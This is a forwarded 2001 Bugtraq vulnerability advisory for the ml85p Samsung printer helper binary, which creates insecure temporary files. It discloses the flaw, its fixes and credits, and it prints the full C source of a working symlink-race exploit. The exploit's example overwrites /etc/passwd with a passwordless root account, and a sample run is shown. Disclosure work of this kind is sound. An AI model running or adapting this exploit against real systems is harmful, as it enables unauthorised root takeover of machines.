----- Forwarded message from Charles Stevenson <[EMAIL PROTECTED]> ----- From: Charles Stevenson <[EMAIL PROTECTED]> To: Bugtraq <[EMAIL PROTECTED]>, [EMAIL PROTECTED] CC: Kevin Finisterre <[EMAIL PROTECTED]> Subject: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package) Date: Tue, 10 Jul 2001 16:27:39 -0600 Message-ID: <[EMAIL PROTECTED]> NOTE TO MODERATOR: PLEASE HOLD UNTIL 16 JULY 2001 TO ALLOW VENDOR TIME TO RELEASE AN UPDATE Author(s): Charles Stevenson, core at ezlink dot com Kevin Finisterre, dotslash at snosoft dot com Date Published: 2001 JULY 16 Revision: 1.0 Advisory ID: N/A Bugtraq ID: 3008 CVE CAN: Non currently assigned. Title: ml85p Linux Helper Binary for Samsung ML-85G Printer Insecure Temporary File Creation Class: Insecure Temporary File Creation Race Condition Remotely Exploitable: No Locally Exploitable: Yes Vulnerability Description: The Samsung ML-85G GDI printer driver (helper binary to me;) suffers from insecure temporary file creation practices. It is possible to create files as root which can lead to root access. Vulnerable Systems: This exploit should be specific to the x86 architecture although rare cases may exist (the symlik attack is not plaform dependant). All systems running ml85p built from tarball are assumed to be vulnerable. ml85p is also distributed by MandrakeSoft in the ghostscript RPM. The permissions are more stringent and would require sys priveleges. I tested it on ml85p built from the tarball on my Debian system and Kevin tested on his Mandrake system. > [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p > -rwsr-x--- 1 root sys 11676 Mar 30 11:43 /usr/bin/ml85p* Mandrake: ghostscript-5.50-71mdk.i586.rpm ghostscript-5.50-67mdk.i586.rpm ghostscript-5.50-67mdk.i586.rpm Solution/Vendor Information/Workaround: The author's site and the source code can be found at: http://members.nbci.com/rpragana/gdiprinters.html Recommended fix... use mkstemp() instead of the homegrown code: line 726: sprintf(gname,"/tmp/ml85g%d",time(0)); Quick fix... chmod 0755 `which ml85p` Vendor notified on: 2001 JULY 10 Credits: The credit goes to my good friend Kevin Finisterre for discovering the vulnerability, I (Charles Stevenson) wrote the proof-of-concept exploit. This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or assistance drafting advisories please mail [EMAIL PROTECTED] Technical Description - Exploit/Concept Code: [-(core@devastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned owned::0:0:root:/root:/bin/bash ml85p-xpl.c by core (c) 2001 > backing up /etc/rc.owned to /tmp/ez.n6ZT1m /bin/cp: cannot stat `/etc/rc.owned': No such file or directory /bin/touch: getting attributes of `/etc/rc.owned': No such file or directory > creating a lot of symlinks Running a few times since I'm lazy. Wrong file format. file position: f Wrong file format. file position: f Wrong file format. file position: f Wrong file format. file position: f Wrong file format. file position: f Wrong file format. file position: f Wrong file format. file position: f Wrong file format. file position: f Wrong file format. file position: f Wrong file format. file position: f -rw-rw-rw- 1 root staff 0 Jul 10 13:14 /etc/rc.owned -rw-rw-rw- 1 root staff 32 Jul 10 13:14 /etc/rc.owned owned::0:0:root:/root:/bin/bash > cleaning up Don't forget to `cp /tmp/ez.n6ZT1m /etc/rc.owned && touch -r /tmp/ez.n6ZT1m /etc/rc.owned`! All done. Enjoy! You'll want to download this from my website or take care to reconstruct the lines which got wrapped. http://www.ezlink.com/~core/hot/ml85p-xpl.c /* ml85p-xpl.c * * Quick hack to exploit ml85p * * Simply run it with the file you want to create/overwrite * and the data you wish to place in the file. * * Example: * * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl * $ ./ml85p-xpl /etc/passwd owned::0:0:root:/root:/bin/bash * * Then login as owned... etc.. * * by Charles Stevenson <[EMAIL PROTECTED]> * * July 10 2001 * * exploit discovered by KF <[EMAIL PROTECTED]> * * shoutz b10z and word to Kevin for the quick tag team :) */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #include <time.h> #define TEMPFILE "/tmp/ez.XXXXXX" #define BRUTE 10 void usage(char*); int main(int argc, char **argv){ char tempfile[128] = TEMPFILE; int fd, i; time_t the_time; char temp[512]; if (argc < 3){ usage(argv[0]); } if((fd = mkstemp(tempfile))==-1){ fprintf(stderr, "Error creating %s!\n",tempfile); exit(1); } /* begin lazy slacker coding */ fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n"); fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile); /* backup old file */ sprintf(temp, "/bin/cp %s %s", argv[1], tempfile); system(temp); /* set the date/time */ sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile); system(temp); the_time = time(NULL); fprintf(stderr, "> creating a lot of symlinks\n"); for (i=0;i<BRUTE;i++){ sprintf(temp, "/tmp/ml85g%d", the_time+i); symlink(argv[1], temp); } sprintf(temp, \ "echo \"b1nary 0utlawz\">file; umask 000 && ml85p -sf file\n", \ argv[2]); fprintf(stderr, "Running a few times since I'm lazy.\n"); for (i=0;i<BRUTE;i++){ system(temp); } sprintf(temp, "/bin/ls -l %s", argv[1]); system(temp); sprintf(temp, "echo \"%s\" > %s", argv[2], argv[1]); system(temp); sprintf(temp, "/bin/ls -l %s", argv[1]); system(temp); sprintf(temp, "/bin/cat %s", argv[1]); system(temp); fprintf(stderr, "> cleaning up\n"); sprintf(temp, "/bin/rm -f /tmp/ml85*"); system(temp); fprintf(stderr, \ "Don't forget to `cp %s %s && touch -r %s %s`!\n",tempfile,\ argv[1], tempfile, argv[1]); fprintf(stderr, "All done. Enjoy!\n"); return 0; } void usage(char *name){ fprintf(stderr, "usage: %s <filename> <data>\n", name); exit(1); } /* EOF */ Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an as is condition. There are no warranties with regard to this information. In no event shall the author(s) be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. ----- End forwarded message ----- -- Elias Levy SecurityFocus.com http://www.securityfocus.com/ Si vis pacem, para bellum